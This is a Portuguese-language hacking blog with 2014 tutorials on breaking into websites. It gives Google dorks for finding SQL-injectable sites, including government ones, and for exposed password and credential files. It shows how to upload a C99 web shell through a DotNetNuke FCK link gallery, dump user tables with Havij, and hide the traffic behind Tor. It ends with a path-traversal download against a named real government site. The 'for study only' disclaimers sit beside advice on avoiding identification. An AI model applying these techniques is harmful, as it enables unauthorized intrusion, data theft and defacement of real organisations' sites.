Como o Google pode ser um aliado para os Hackers

O Google Search pode ser um grande aliado para hackers ou cracker, com apenas uma pesquisa de um termo eu posso achar milhares de sites vulneraveis a diversos tipos de ataques.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

sábado, 27 de setembro de 2014

Como ativar o Telnet do Windows

  Quem já tentou dar o comando telnet no cmd do windows que obteve a resposta ‘telnet’ não é reconhecido como um comando interno ou externo… ?
  Em versões anteriores do windows o telnet vem ativado, pelo contrario do windows 7 ja que no win7 vem desativado, mais isso nao impede que você ative-o manualmente.
  Se você quiser saber oque é telnet veja um breve resumo sobre telnet no site Mundo dos Hackers clicando aqui.

Tutorial

1- Primeiramente clique no botão iniciar 

2- Pesquise por "Programas e Recursos"

3- Ao lado esquerdo clique em "Ativar ou desativar recursos do Windows".


4- Espere carregar, e quando terminar de carregar clique na caixa cliente Telnet e clique em ok


5- Pronto, agora o telnet do seu windows 7 estará ativado.

Como ver portas abertas pelo cmd

Quer ver quais portas estão aberta no seu computador? nesse tutorial nós vamos ensinar:
Não é uma das melhores maneiras, e também não é uma maneira nova, mais muitos ainda nao conhecem ou não sabem fazer, Vamos la.

Primeiramente Clique no botão iniciar  e digite CMD e aperte ENTER 
Se você for solicitado a informar uma senha de administrador  ou sua confirmação, digite a senha ou forneça a confirmação.
Vai abrir o prompt de comando do Windows, digite ipconfig /all e aperte ENTER
Logo após de ler todas as informações necessárias, digite o seguinte comando: netstat -a



sábado, 30 de agosto de 2014

Como fazer Scanner com strings google e Invadindo site

Com esse tutorial simples é rápido vamos aprender como fazer upload em sites rapidamente e depois ter acesso.
ATENÇÃO: O tutorial que vera a seguir é apenas para estudos, use esse tutorial para testar vulnerabilidades em seu site e melhorar-lo, jamais use esse tutorial para prejudicar alguém.
Lembre-se: Invadir dispositivo informático é crime. Art. 154-A so codigo penal.

E lembre-se Também: Conhecimento não é crime!

Etapa 01 -
Acesse o www.google.com.br

Etapa 02 -
A busca use o código de pesquisa sabiamente.
Procure pelo seguinte termo
Código:
inurl:/tabid/36/language/en-US/Default.aspx

Etapa 03 -
Com a busca efetuada Aproximadamente 582 resultados (0,25 segundos) escolha um site de sua preferencia,
e substitua o termo "/tabid/36/language/en-US/Default.aspx" por,
Código:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Exemplo:
www.site.com.br/tabid/36/language/en-US/Default.aspx      -01

www.site.com.br/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx -02


Etapa 04 -Você vai ter um link page.So Gallary onde pode criar urls para dentro dos site
Etapa 05 -Não faça nada por enquanto, abordando fase final.
"A caixa e parecida com essa."
PART 01 Scanneando com strings google e Invadindo site

Etapa 06 -
Agora substitua a URL na barra de endereços com um simples script
"delete o endereço do site e cole o código abaixo"
Código:
javascript:__doPostBack('ctlURL$cmdUpload','')

"Depois do script inserido na barra de endereços a caixa fica assim"
PART 02 Scanneando com strings google e Invadindo site


Etapa 07 -
Você vai encontrar a opção de Upload

Etapa 08 -
Selecione Raiz
  
Etapa 09 -
Envie seu pacote de Seu Shell C99, C100 etc..


OBS: todos esse processos foram feitos para que entenda como funciona
podemos ir deireto á fonte também.
Código:
intext:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

ou

Código:
*Fck/fcklinkgallery.aspx 

 ou

Código:
intitle:"Link Gallery" +fcklinkgallery ext:aspx

Como o Google pode ser um aliado para os Hackers

Como o Google pode ser um aliado para os Hackers

O Google Search pode ser um grande aliado para hackers ou cracker, com apenas uma pesquisa de um termo eu posso achar milhares de sites vulneraveis a diversos tipos de ataques.
 Esses termos são chamados de Strings ou Dork, e existe milhões delas, e é bastante comum usa-las para procurar por sites vulneráveis aleatoriamente, para pegar dados ou dar deface, abaixo iremos ver algumas Strings e suas finalidades.

ATENÇÃO: O tutorial que vera a seguir é apenas para estudos, use esse tutorial para testar vulnerabilidades em seu site e melhorar-lo, jamais use esse tutorial para prejudicar alguém.
Lembre-se: Invadir dispositivo informático é crime. Art. 154-A so codigo penal.
E lembre-se Também: Conhecimento não é crime!

Strings sites vulneraveis mysql injection

Para pesquisar por sites vulneraveis a sql injection, podemos pesqusiar por:
inurl:.php?id=

Ou seja, ele ira pesquisar por sites que tenha em sua url com o termo .php?id , que geralmente serão vulneraveis,
se pesquisar por inurl:.php?id= vera varios sites supostamente vulneraveis a sql injection.

Se estiver querendo achar sites do governo brasileiro vulneraveis, basta pesquisar pelo termo inurl:gov.br .php?id=

Se o individuo quiser pesquisar por exemplo sites de hotel vulneraveis pode pesquisar por hotel .php?id= , 
Para ver se um site é realmente vulneravel basta adicionar um ' no final da url, se ele retornar uma mensagem de erro é por que é vulneravel, por exemplo:
www.sitevulneravel.com.br/noticias.php?id=15'
Se ele retornar uma mensagem de erro, é por que é vulneravel.

String Busca PASSWORD

Para pesquisar por passwords podemos usar varias string, abaixo veremos eles e suas funções.

1- Busca de "index of" = Diretórios sem index, com arquivos que contenham senhas.
String: intitle:"Index of" .bash_history
 "intitle:"= Busca dentro do título, "Index of"= Diretório sem index", ".bash_history"= histórico de comandos inseridos na plataforma linux.


2- Busca de "index of" = Diretórios com nome passwd sem index, com arquivos que contenham senhas. 
String: intitle:"index of" passwd
"intitle:"= Busca dentro do título, "Index of"= Diretório sem index", "passwd"= Diretório ou arquivos com senha.




3- Busca de "index of" = Diretórios sem index, com arquivos que envolvam  lista de users & contenham senhas.
String: intitle:"index of" people.lst
"intitle:"= Busca dentro do título, "Index of"= Diretório sem index","people.lst"=lista de users & pass de um determinado server geralmente Windows.
OBS: Geralmente acompanhado de um arquivo login.html* que com senhas contidas no arquivo.lst é acessível.


 4- Busca de "index of" = Diretórios sem index, com pastas que envolva  ADMIN / CONTAS / PASS / SENHAS,
String: intitle:"index of" admin OR accounts OR pass OR senha
"intitle:"= Busca dentro do título, "Index of"= Diretório sem index", "admin  accounts  pass  senha"=
diretorio ou arquivo que contenha nivel de ADM no server ou senha, "OR"= vem do inglês significa "OU" .

String Busca login senha em arquivos csv

String: ext:csv  intext:(|senha|login|usua|pass|admin|user|)
EX01:ext= Determina o arquivo a ser buscado, csv=formato do arquivo, intext=busca textos especificos dentro de sites ou arquivos, (|senha|login|usua|pass|admin|user|)=texto a ser buscado, significa (senha ou login ou usuario ou password ou administrador ou user).

OBS:Variaveis que pode ajudar em sua busca etc.. 
Pode restringir toda busca para um determinado domínio com comando Site:domínio ou  subdomínio
EX02:site:gov.br ext:csv  intext:(|senha|login|usua|pass|admin|user|)
EX03:site:.br ext:csv intext:(senha|login|usua|pass|admin|user)

Dork para busca de emails

Para pesquisar por emails devemos usar a dork abaixo:
inurl:com.br  +@ +gov +mail  filetype:txt

Vulnerabilidade em base de email

Vulnerabilidade em base de email com os termos "Mailbase +br txt" temos acesso a base de mail de vários sites com email brasileiros e internacionais no formato txt
Quantidade:Aproximadamente 1 string
Autor:Cleiton Pinheiro
Fonte:blog.inurl.com

Código:
inurl:mailbase +br ext:txt

Buscar por câmeras

String:intitle:"Live View / - AXIS" | inurl:view/view.shtml


sexta-feira, 29 de agosto de 2014

Conectando a um Mysql via Terminal Linux usando Tor Proxy



Injection SQL

Conectando a um Mysql via Terminal Linux usando Tor Proxy

Para quem meche com hacking ou esta querendo aprender, o anonimato é muito importante.

Nesse tutorial vamos usar o Tor & proxychains.
Creio que todos saibam oque é tor, mas vamos saber oque é proxychains.

Proxychains é uma grande ajuda nesse conceito de anonimato, pois o seu conceito é  Chains que significa cadeia, ou seja uma cadeia de ligações de proxys até ser alcançado o servidor alvo.
ATENÇÃO: O tutorial que vera a seguir é apenas para estudos, use esse tutorial para testar vulnerabilidades em seu site e melhorar-lo, jamais use esse tutorial para prejudicar alguém.
Lembre-se: Invadir dispositivo informático é crime. Art. 154-A so codigo penal.
E lembre-se Também: Conhecimento não é crime!
Instale o tor:
# sudo apt-get install tor 

Instale o Proxychains:
# sudo apt-get install proxychains 

Analisando o Codigo do Proxychains:
# nano /etc/proxychains.conf 

Veja se no final tem o seguinte codigo:
socks4  127.0.0.1 9050
Se não tiver, adicione-o.

Reinicio o tor
# sudo service tor stop 

Inicie o tor:
# sudo service tor start 

Inicie o tor sempre que o sistema for iniciado.

Acessando o mysql usando Tor Proxy
# proxychains mysql -u usuariomysql -p -h example.com nomedadb

Entendendo: 
Proxychains >> Ferramenta usada para camuflar o trafego
Mysql >> Ferramenta para conexão com o banco de dados
-u >> Usuário do Banco de dados
-p >> Senha, que vai ser pedida logo após a conexão
-h >> Hostname. Url do site

domingo, 24 de agosto de 2014

Como Fazer invasão sql injection pelo hajiv

Nível: Médio
ATENÇÃO: O tutorial que vera a seguir é apenas para estudos, use esse tutorial para testar vulnerabilidades em seu site e melhorar-lo, jamais use esse tutorial para prejudicar alguém.
Lembre-se: Invadir dispositivo informático é crime. Art. 154-A so codigo penal.
E lembre-se Também: Conhecimento não é crime!

Introdução

Nesse tutorial eu vou ensinar a como fazer uma invasão sql injection, pessoas mal intencionadas utilizam essa técnica para pegar dados como endereço, telefone, identidade, cpf, entre outros dados, mais igual eu falei acima, isso é crime, nós iremos utilizar apenas para conhecimento e testar se seu site é vulnerável.


O que é SQL Injection

A SQL Injection, é um tipo de ameaça de segurança que se aproveita de falhas em sistemas que interagem com bases de dados via SQL. A injeção de SQL ocorre quando o atacante consegue inserir uma série de instruções SQL dentro de uma consulta (query) através da manipulação das entradas de dados de uma aplicação.



Use VPN

Use um camuflador de ip antes de prossegui com o tutorial, é muito importante, impedindo que algum o identifique durante um ataque


Vamos começar!

Como Fazer invasão sql injection


Bom, para testarmos essa técnica precisamos de um site vulnerável, Vá no google e pesquise por  inurl:noticias.php?id= , vai parecer um monte de sites vulneráveis, eu vou utilizar o site http://www.webscantest.com.

Para o site ser vulnerável ele tem que ter uma variável na sua url, algo tipo:
sitevul.com/noticia.php?id=15
O que esta de vermelho é uma variável, para ver se o site é realmente vulnerável coloque '1=1' no final do código, que ficaria assim
sitevul.com/noticia.php?id=15'1=1'
Se ele retornar erro de sql ele é vulnerável.
Chega de enrolação e vamos trabalhar!

Já com seu site vulneravel em mãos,vamos baixar um programinhas o Havij, é um programinha que que serve para fazer invasões sql injection, depois de baixar instale-o.

1. Depois de instalado abra-o:
   






2. Em target coloque a url vulneravel:


3. Depois de colocar o link vulneravel, clique em analyze:


4. Em baixo ele começara a fazer os processo:

Aguarde...
5. Quando aparecer "Current DB" é por que deu certo!

6. Depois clique em "Tables"

7. Depois Clique em "Get Tables", Ira aparecer algumas tabelas



8. Marca a tabela que tiver "user" "usuários" "logins" "accounts" ou algo do tipo:
9. Depois Clique em "Get Columns"

10. Marque os dados que vc quer pegar, no meu caso uname e passwd, e clique em "Get Data"

Mais notou algo estranho nessas senhas?? é que elas estão criptografadas!
Elas descriptografadas ficariam assim: 

user: admin 
senha:admin

user: testuser
senha: testpass

Você deve estar pensando ué, como descriptografa? Clique Aqui

Links uteis:



sexta-feira, 22 de agosto de 2014

como explorar falhas Fopen e Baixar arquivos do site

Como Explorar Falhas Fopen e Baixar Arquivos do Site

Introdução:

Nesse tutorial eu vou ensinar a explorar falhas fopen e baixar arquivos do site, como a index.php por exemplo.


ATENÇÃO: O tutorial que vera a seguir é apenas para estudos, use esse tutorial para testar vulnerabilidades em seu site e melhorar-lo, jamais use esse tutorial para prejudicar alguém.
Lembre-se: Invadir dispositivo informático é crime. Art. 154-A so codigo penal.
E lembre-se Também: Conhecimento não é crime!

Achando um site com falha fopen!



Bom, para testarmos devemos usar um site com falha de fopen, eu vou usar o aesa.pb.gov.br, mais você pode pesquisar por inurl:"download.php?file=" no google que aparecera varios sites com falha de fopen.


Explorando Falhas e baixando arquivos

Ja com um site vulneravel na mão, vamos explorar suas falhas e baixar seus arquivos, como a index.php.
Entre no seu site vulneravel, no meu caso o aesa.pb.gov.br,

Abra uma categoria no site, tipo aesa.pb.gov.br/geoprocessamento

Na frente coloque o codigo /download.php?file=../index.php e aperte enter

A index.php sera baixada.